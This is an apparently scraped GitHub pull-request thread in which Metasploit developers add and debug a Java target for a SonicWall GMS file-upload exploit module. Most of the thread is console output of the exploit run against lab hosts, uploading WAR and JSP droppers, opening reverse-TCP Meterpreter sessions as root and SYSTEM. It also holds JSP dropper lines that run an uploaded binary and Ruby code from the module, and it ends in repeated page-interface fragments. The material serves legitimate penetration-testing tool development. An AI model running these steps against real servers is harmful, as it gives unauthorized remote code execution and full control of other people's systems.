Java target for Sonicwall GMS upload module #1459

jlee-r7 · 2013-02-08T03:57:29Z

Still some debugging junk, needs some more love.

This just puts a bandaid around the issue and makes it so FileDropper doesn't completely break java and posix meterpreter sessions. [SeeRM rapid7#7721]

Conflicts: modules/exploits/multi/http/sonicwall_gms_upload.rb Adds a loop around triggering the WAR payload, which was causing some unreliability with the Java target.

jvazquez-r7 · 2013-02-08T07:35:11Z

Looking into it!

jvazquez-r7 · 2013-02-08T07:49:08Z

Eyeballed and looks good, testing, linux:

msf > use exploit/multi/http/sonicwall_gms_upload 
msf  exploit(sonicwall_gms_upload) > set rhost 192.168.1.172
rhost => 192.168.1.172
msf  exploit(sonicwall_gms_upload) > check

[*] Target looks like Linux
[+] The target is vulnerable.
msf  exploit(sonicwall_gms_upload) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   SonicWALL GMS 6.0 Viewpoint / Java Universal
   1   SonicWALL GMS 6.0 Viewpoint / Windows 2003 SP2
   2   SonicWALL GMS 6.0 Viewpoint Virtual Appliance (Linux)


msf  exploit(sonicwall_gms_upload) > set target 0
target => 0
msf  exploit(sonicwall_gms_upload) > exploit

[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.172:80 - Retrieving Tomcat installation path...
[+] 192.168.1.172:80 - Tomcat installed on /opt/GMSVP/Tomcat/
[*] 192.168.1.172:80 - Uploading WAR file
[*] 192.168.1.172:80 - Attempting to launch payload in deployed WAR...
[*] 192.168.1.172:80 - Attempting to launch payload in deployed WAR...
[*] Sending stage (30216 bytes) to 192.168.1.172
[*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.172:39062) at 2013-02-08 08:47:51 +0100
[+] Deleted /opt/GMSVP/Tomcat/webapps/zSVafnXHnH0E7KVH0se.war
[+] Deleted /opt/GMSVP/Tomcat/webapps/appliance/xCzYxwOr.jsp

meterpreter > getuid
Server username: root
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.172 - Meterpreter session 1 closed.  Reason: User exit
msf  exploit(sonicwall_gms_upload) > set target 2
target => 2
msf  exploit(sonicwall_gms_upload) > exploit

[-] Exploit failed: java/meterpreter/reverse_tcp is not a compatible payload.
[*] Exploit completed, but no session was created.
msf  exploit(sonicwall_gms_upload) > set payload linux/x86/meterpreter/reverse_tcp 
payload => linux/x86/meterpreter/reverse_tcp
msf  exploit(sonicwall_gms_upload) > set lhost 192.168.1.128
lhost => 192.168.1.128
msf  exploit(sonicwall_gms_upload) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.172:80 - Retrieving Tomcat installation path...
[+] 192.168.1.172:80 - Tomcat installed on /opt/GMSVP/Tomcat/
[*] 192.168.1.172:80 - Uploading executable file
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.1.172
[*] Meterpreter session 2 opened (192.168.1.128:4444 -> 192.168.1.172:39063) at 2013-02-08 08:48:22 +0100
[+] Deleted /opt/GMSVP/Tomcat/MAnxPyWv
[+] Deleted /opt/GMSVP/Tomcat/webapps/appliance/svXrLzor.jsp

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.172 - Meterpreter session 2 closed.  Reason: User exit

jvazquez-r7 · 2013-02-08T07:54:11Z

First tests on Windows failed, looking into this

msf  exploit(sonicwall_gms_upload) > set rhost 192.168.1.140
rhost => 192.168.1.140
msf  exploit(sonicwall_gms_upload) > check

[*] Target looks like Windows
[+] The target is vulnerable.
msf  exploit(sonicwall_gms_upload) > set target 0
target => 0
msf  exploit(sonicwall_gms_upload) > set payload java/meterpreter/reverse_tcp 
payload => java/meterpreter/reverse_tcp
msf  exploit(sonicwall_gms_upload) > exploit

[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.140:80 - Retrieving Tomcat installation path...
[+] 192.168.1.140:80 - Tomcat installed on C:\GMSVP\Tomcat\
[*] 192.168.1.140:80 - Uploading WAR file
[*] 192.168.1.140:80 - Attempting to launch payload in deployed WAR...
[*] 192.168.1.140:80 - Attempting to launch payload in deployed WAR...
[*] 192.168.1.140:80 - Attempting to launch payload in deployed WAR...
[*] 192.168.1.140:80 - Attempting to launch payload in deployed WAR...
[*] 192.168.1.140:80 - Attempting to launch payload in deployed WAR...
[*] 192.168.1.140:80 - Attempting to launch payload in deployed WAR...
^C[-] Exploit failed: Interrupt 
[!] This exploit may require manual cleanup of: C:\GMSVP\Tomcat\/webapps/Qg3w62TK3afsS3MkcFioML0Der.war
[!] This exploit may require manual cleanup of: C:\GMSVP\Tomcat\/webapps/appliance/jcVczJHS.jsp
[*] Exploit completed, but no session was created.
msf  exploit(sonicwall_gms_upload) > set target 1
target => 1
msf  exploit(sonicwall_gms_upload) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(sonicwall_gms_upload) > set lhost 192.168.1.128
lhost => 192.168.1.128
msf  exploit(sonicwall_gms_upload) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.140:80 - Retrieving Tomcat installation path...
[+] 192.168.1.140:80 - Tomcat installed on C:\GMSVP\Tomcat\
[*] 192.168.1.140:80 - Uploading executable file
[!] This exploit may require manual cleanup of: C:\GMSVP\Tomcat\aNLcAMSx
[!] This exploit may require manual cleanup of: C:\GMSVP\Tomcat\webapps\appliance\hwHmaVDo.jsp
[*] Exploit completed, but no session was created.

jvazquez-r7 · 2013-02-08T08:22:51Z

Problem on windows when launching the native payload:

org.apache.jasper.JasperException: Unable to compile class for JSP: 

An error occurred at line: 4 in the jsp file: /dFowQYSC.jsp
Invalid escape sequence (valid ones are  \b  \t  \n  \f  \r  \"  \'  \\ )
1: <%@ page import="java.io.*" %>
2: <%
3: String data = "504b030414000000000026......0";
4: FileOutputStream outputstream = new FileOutputStream("C:\GMSVP\Tomcat\/webapps/ZYxvMp84ZI.war");
5: int numbytes = data.length();
6: byte[] bytes = new byte[numbytes/2];
7: for (int counter = 0; counter < numbytes; counter += 2)


Stacktrace:
    org.apache.jasper.compiler.DefaultErrorHandler.javacError(DefaultErrorHandler.java:92)
    org.apache.jasper.compiler.ErrorDispatcher.javacError(ErrorDispatcher.java:330)
    org.apache.jasper.compiler.JDTCompiler.generateClass(JDTCompiler.java:439)
    org.apache.jasper.compiler.Compiler.compile(Compiler.java:334)
    org.apache.jasper.compiler.Compiler.compile(Compiler.java:312)
    org.apache.jasper.compiler.Compiler.compile(Compiler.java:299)
    org.apache.jasper.JspCompilationContext.compile(JspCompilationContext.java:586)
    org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:317)
    org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:342)
    org.apache.jasper.servlet.JspServlet.service(JspServlet.java:267)
    javax.servlet.http.HttpServlet.service(HttpServlet.java:717)

It can be solved by escaping "" chars, I added it to jsp_drop_bin for testing. After that another exception because chmod isn't available, after avoiding the chmod line:

org.apache.jasper.JasperException: An exception occurred processing JSP page /JfWmiojx.jsp at line 21

18: %>
19: <%@ page import="java.io.*" %>
20: <%
21: Runtime.getRuntime().exec("chmod +x C:\\GMSVP\\Tomcat\\uZFdHvgK");
22: Runtime.getRuntime().exec("C:\\GMSVP\\Tomcat\\uZFdHvgK");
23: %>


Stacktrace:
    org.apache.jasper.servlet.JspServletWrapper.handleJspException(JspServletWrapper.java:505)
    org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:404)
    org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:342)
    org.apache.jasper.servlet.JspServlet.service(JspServlet.java:267)
    javax.servlet.http.HttpServlet.service(HttpServlet.java:717)
root cause

java.io.IOException: Cannot run program "chmod": CreateProcess error=2, The system cannot find the file specified
    java.lang.ProcessBuilder.start(Unknown Source)
    java.lang.Runtime.exec(Unknown Source)
    java.lang.Runtime.exec(Unknown Source)
    java.lang.Runtime.exec(Unknown Source)
    org.apache.jsp.JfWmiojx_jsp._jspService(JfWmiojx_jsp.java:77)
    org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)
    javax.servlet.http.HttpServlet.service(HttpServlet.java:717)
    org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:374)
    org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:342)
    org.apache.jasper.servlet.JspServlet.service(JspServlet.java:267)
    javax.servlet.http.HttpServlet.service(HttpServlet.java:717)
root cause

java.io.IOException: CreateProcess error=2, The system cannot find the file specified
    java.lang.ProcessImpl.create(Native Method)
    java.lang.ProcessImpl.<init>(Unknown Source)
    java.lang.ProcessImpl.start(Unknown Source)
    java.lang.ProcessBuilder.start(Unknown Source)
    java.lang.Runtime.exec(Unknown Source)
    java.lang.Runtime.exec(Unknown Source)
    java.lang.Runtime.exec(Unknown Source)
    org.apache.jsp.JfWmiojx_jsp._jspService(JfWmiojx_jsp.java:77)
    org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)
    javax.servlet.http.HttpServlet.service(HttpServlet.java:717)
    org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:374)
    org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:342)
    org.apache.jasper.servlet.JspServlet.service(JspServlet.java:267)
    javax.servlet.http.HttpServlet.service(HttpServlet.java:717)

After avoiding chmod in case of windows target:

msf  exploit(sonicwall_gms_upload) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.140:80 - Retrieving Tomcat installation path...
[+] 192.168.1.140:80 - Tomcat installed on C:\GMSVP\Tomcat\
[*] 192.168.1.140:80 - Uploading executable file
[*] Sending stage (752128 bytes) to 192.168.1.140
[*] Meterpreter session 3 opened (192.168.1.128:4444 -> 192.168.1.140:1202) at 2013-02-08 09:19:05 +0100
[+] Deleted C:\GMSVP\Tomcat\webapps\appliance\RfPBiDhi.jsp
[!] This exploit may require manual cleanup of: C:\\GMSVP\\Tomcat\\fYquDjme

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.140 - Meterpreter session 3 closed.  Reason: User exit

jvazquez-r7 · 2013-02-08T08:26:12Z

The java target issues on windows were the same as above:

msf  exploit(sonicwall_gms_upload) > set target 0
target => 0
msf  exploit(sonicwall_gms_upload) > set payload java/meterpreter/reverse_tcp 
payload => java/meterpreter/reverse_tcp
msf  exploit(sonicwall_gms_upload) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.140:80 - Retrieving Tomcat installation path...
[+] 192.168.1.140:80 - Tomcat installed on C:\GMSVP\Tomcat\
[*] 192.168.1.140:80 - Uploading WAR file
[*] 192.168.1.140:80 - Attempting to launch payload in deployed WAR...
[*] 192.168.1.140:80 - Attempting to launch payload in deployed WAR...
[*] 192.168.1.140:80 - Attempting to launch payload in deployed WAR...
[*] 192.168.1.140:80 - Attempting to launch payload in deployed WAR...
[*] Sending stage (30216 bytes) to 192.168.1.140
[*] Meterpreter session 4 opened (192.168.1.128:4444 -> 192.168.1.140:1204) at 2013-02-08 09:24:05 +0100
[+] Deleted C:\\GMSVP\\Tomcat\\/webapps/yfIOV.war
[+] Deleted C:\GMSVP\Tomcat\/webapps/appliance/UDsyaHWD.jsp

meterpreter >

I'm going to comment code and wait for @jlee-r7 feedback, thanks @jlee-r7 !

jvazquez-r7 · 2013-02-08T08:29:36Z

modules/exploits/multi/http/sonicwall_gms_upload.rb

+	def jsp_execute_command(command)
+		jspraw =  %Q|<%@ page import="java.io.*" %>\n|
+		jspraw << %Q|<%\n|
+		jspraw << %Q|Runtime.getRuntime().exec("chmod +x #{command}");\n|


To avoid issues on windows system I'm doing it:

jspraw << %Q|try {\n| jspraw << %Q|Runtime.getRuntime().exec("chmod +x #{command}");\n| jspraw << %Q|} catch (IOException ioe) {\n| jspraw << %Q|}\n|

Makes sense, thanks!

* Catch IOError when chmod doesn't exist (i.e. Windows) * Proper escaping for paths

Fixes the java target on windows victims

jvazquez-r7 · 2013-02-08T18:17:58Z

Awesome! Working fine now! merging!

msf  exploit(sonicwall_gms_upload) > set rhost 192.168.1.140 
rhost => 192.168.1.140
msf  exploit(sonicwall_gms_upload) > set target 0
target => 0
msf  exploit(sonicwall_gms_upload) > rexploit
[*] Reloading module...

[-] Exploit failed: windows/meterpreter/reverse_tcp is not a compatible payload.
msf  exploit(sonicwall_gms_upload) > set payload java/meterpreter/reverse_tcp 
payload => java/meterpreter/reverse_tcp
msf  exploit(sonicwall_gms_upload) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.140:80 - Retrieving Tomcat installation path...
[+] 192.168.1.140:80 - Tomcat installed on C:\GMSVP\Tomcat\
[*] 192.168.1.140:80 - Uploading WAR file
[*] 192.168.1.140:80 - Attempting to launch payload in deployed WAR...
[*] 192.168.1.140:80 - Attempting to launch payload in deployed WAR...
[*] 192.168.1.140:80 - Attempting to launch payload in deployed WAR...
[*] 192.168.1.140:80 - Attempting to launch payload in deployed WAR...
[*] Sending stage (30216 bytes) to 192.168.1.140
[*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.140:1216) at 2013-02-08 19:14:29 +0100
[+] Deleted C:\\GMSVP\\Tomcat\\webapps\\TLg2hvQeRJMuk.war
[+] Deleted C:\\GMSVP\\Tomcat\\webapps\\appliance\\qBuyhABq.jsp

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.140 - Meterpreter session 1 closed.  Reason: User exit
msf  exploit(sonicwall_gms_upload) > set target 1
target => 1
msf  exploit(sonicwall_gms_upload) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(sonicwall_gms_upload) > set lhost 192.168.1.128
lhost => 192.168.1.128
msf  exploit(sonicwall_gms_upload) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.140:80 - Retrieving Tomcat installation path...
[+] 192.168.1.140:80 - Tomcat installed on C:\GMSVP\Tomcat\
[*] 192.168.1.140:80 - Uploading executable file
[*] Sending stage (752128 bytes) to 192.168.1.140
[*] Meterpreter session 2 opened (192.168.1.128:4444 -> 192.168.1.140:1217) at 2013-02-08 19:15:59 +0100
[+] Deleted C:\\GMSVP\\Tomcat\\webapps\\appliance\\CyQrBRtn.jsp
[!] This exploit may require manual cleanup of: C:\\GMSVP\\Tomcat\\wcTGrbVN

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.140 - Meterpreter session 2 closed.  Reason: User exit
msf  exploit(sonicwall_gms_upload) > set target 0
target => 0
msf  exploit(sonicwall_gms_upload) > set payload java/meterpreter/reverse_tcp 
payload => java/meterpreter/reverse_tcp
msf  exploit(sonicwall_gms_upload) > set rhost 192.168.1.172
rhost => 192.168.1.172
msf  exploit(sonicwall_gms_upload) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.172:80 - Retrieving Tomcat installation path...
[+] 192.168.1.172:80 - Tomcat installed on /opt/GMSVP/Tomcat/
[*] 192.168.1.172:80 - Uploading WAR file
[*] 192.168.1.172:80 - Attempting to launch payload in deployed WAR...
[*] 192.168.1.172:80 - Attempting to launch payload in deployed WAR...
[*] 192.168.1.172:80 - Attempting to launch payload in deployed WAR...
[*] Sending stage (30216 bytes) to 192.168.1.172
[*] Meterpreter session 3 opened (192.168.1.128:4444 -> 192.168.1.172:39065) at 2013-02-08 19:16:58 +0100
[+] Deleted /opt/GMSVP/Tomcat/webapps/in857c.war
[+] Deleted /opt/GMSVP/Tomcat/webapps/appliance/FBNNlAty.jsp

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.172 - Meterpreter session 3 closed.  Reason: User exit
msf  exploit(sonicwall_gms_upload) > check

[*] Target looks like Linux
[+] The target is vulnerable.
msf  exploit(sonicwall_gms_upload) > set target 2
target => 2
msf  exploit(sonicwall_gms_upload) > set payload linux/x86/meterpreter/reverse_tcp 
payload => linux/x86/meterpreter/reverse_tcp
msf  exploit(sonicwall_gms_upload) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.172:80 - Retrieving Tomcat installation path...
[+] 192.168.1.172:80 - Tomcat installed on /opt/GMSVP/Tomcat/
[*] 192.168.1.172:80 - Uploading executable file
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.1.172
[*] Meterpreter session 4 opened (192.168.1.128:4444 -> 192.168.1.172:39066) at 2013-02-08 19:17:20 +0100
[+] Deleted /opt/GMSVP/Tomcat/VgxbzWUi
[+] Deleted /opt/GMSVP/Tomcat/webapps/appliance/jrYRscsy.jsp

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.172 - Meterpreter session 4 closed.  Reason: User exit
msf  exploit(sonicwall_gms_upload) >

egypt added 9 commits January 28, 2013 00:01

Doc cleanup

3fc9b5d

Initial support for Java target

044fefd

Still some debugging junk, needs some more love.

typo

b6c6397

Works for java and native linux targets

13d1045

Fix some comments that yard parsed incorrectly

bf28be7

Fix comment link and some whitespace

16a0ab1

Add a method to upload and exec in one step

1f9a09d

Guard against running broken method on non-windows

e535a3e

This just puts a bandaid around the issue and makes it so FileDropper doesn't completely break java and posix meterpreter sessions. [SeeRM rapid7#7721]

Merge branch 'rapid7' into sonicwall_gms

071df72

Conflicts: modules/exploits/multi/http/sonicwall_gms_upload.rb Adds a loop around triggering the WAR payload, which was causing some unreliability with the Java target.

jvazquez-r7 reviewed Feb 8, 2013
View reviewed changes

This was referenced Feb 8, 2013

added CMD type payload for unix targets #1384

Closed

fix REALLY on_new_session issue #1369

Closed

egypt added 2 commits February 8, 2013 11:52

Couple of fixes for windows

5b39807

* Catch IOError when chmod doesn't exist (i.e. Windows) * Proper escaping for paths

Use the install path to tell us the separator

9b6f2fc

Fixes the java target on windows victims

jvazquez-r7 merged commit 9b6f2fc into rapid7:master Feb 8, 2013

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Java target for Sonicwall GMS upload module #1459

Java target for Sonicwall GMS upload module #1459

jlee-r7 commented Feb 8, 2013

jvazquez-r7 commented Feb 8, 2013

jvazquez-r7 commented Feb 8, 2013

jvazquez-r7 commented Feb 8, 2013

jvazquez-r7 commented Feb 8, 2013

jvazquez-r7 commented Feb 8, 2013

jvazquez-r7 Feb 8, 2013

jlee-r7 Feb 8, 2013

jvazquez-r7 commented Feb 8, 2013

Java target for Sonicwall GMS upload module #1459

Java target for Sonicwall GMS upload module #1459

Conversation

jlee-r7 commented Feb 8, 2013

jvazquez-r7 commented Feb 8, 2013

jvazquez-r7 commented Feb 8, 2013

jvazquez-r7 commented Feb 8, 2013

jvazquez-r7 commented Feb 8, 2013

jvazquez-r7 commented Feb 8, 2013

jvazquez-r7 Feb 8, 2013

Choose a reason for hiding this comment

jlee-r7 Feb 8, 2013

Choose a reason for hiding this comment

jvazquez-r7 commented Feb 8, 2013